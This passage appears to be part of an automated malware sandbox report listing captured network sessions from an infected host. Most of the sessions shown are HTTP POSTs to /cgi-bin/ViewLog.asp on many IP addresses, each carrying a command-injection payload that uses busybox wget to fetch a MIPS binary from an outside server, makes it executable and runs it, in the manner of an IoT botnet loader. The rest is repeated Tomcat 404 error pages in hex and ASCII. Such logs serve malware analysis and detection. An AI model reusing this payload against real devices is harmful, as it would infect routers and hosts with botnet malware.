67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 39 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <html><head><title>Apache Tomcat/7.0.59 - Error report</title><style>...H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 404 - /cgi-bin/ViewLog.asp</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>/cgi-bin/ViewLog.asp</u></p><p><b>description</b> <u>The requested resource is not available.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/7.0.59</h3></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              136192.168.2.144352094.122.210.2058080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:37.445271015 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              137192.168.2.144031262.29.3.1448080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:37.585587025 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              138192.168.2.144757095.86.107.858080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:37.594247103 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              139192.168.2.145174895.165.203.668080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:37.797441006 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              140192.168.2.145575062.29.58.918080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:37.812202930 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              141192.168.2.143395231.200.116.18080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:37.813118935 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              142192.168.2.144594094.120.12.918080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:37.874408007 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              143192.168.2.144820462.162.114.1978080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:39.329097033 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:39.544878006 CET1227INHTTP/1.1 404 Not Found
                                              Server: Apache-Coyote/1.1
                                              Content-Type: text/html;charset=utf-8
                                              Content-Language: en
                                              Content-Length: 989
                                              Date: Thu, 23 Nov 2023 04:12:46 GMT
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 39 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 39 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <html><head><title>Apache Tomcat/7.0.59 - Error report</title><style>...H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 404 - /cgi-bin/ViewLog.asp</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>/cgi-bin/ViewLog.asp</u></p><p><b>description</b> <u>The requested resource is not available.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/7.0.59</h3></body></html>
                                              Nov 23, 2023 05:15:40.695611954 CET1227INHTTP/1.1 404 Not Found
                                              Server: Apache-Coyote/1.1
                                              Content-Type: text/html;charset=utf-8
                                              Content-Language: en
                                              Content-Length: 989
                                              Date: Thu, 23 Nov 2023 04:12:46 GMT
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 39 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 39 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <html><head><title>Apache Tomcat/7.0.59 - Error report</title><style>...H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 404 - /cgi-bin/ViewLog.asp</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>/cgi-bin/ViewLog.asp</u></p><p><b>description</b> <u>The requested resource is not available.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/7.0.59</h3></body></html>
                                              Nov 23, 2023 05:15:42.999619007 CET1227INHTTP/1.1 404 Not Found
                                              Server: Apache-Coyote/1.1
                                              Content-Type: text/html;charset=utf-8
                                              Content-Language: en
                                              Content-Length: 989
                                              Date: Thu, 23 Nov 2023 04:12:46 GMT
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 39 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 39 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <html><head><title>Apache Tomcat/7.0.59 - Error report</title><style>...H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 404 - /cgi-bin/ViewLog.asp</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>/cgi-bin/ViewLog.asp</u></p><p><b>description</b> <u>The requested resource is not available.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/7.0.59</h3></body></html>
                                              Nov 23, 2023 05:15:47.599699020 CET1227INHTTP/1.1 404 Not Found
                                              Server: Apache-Coyote/1.1
                                              Content-Type: text/html;charset=utf-8
                                              Content-Language: en
                                              Content-Length: 989
                                              Date: Thu, 23 Nov 2023 04:12:46 GMT
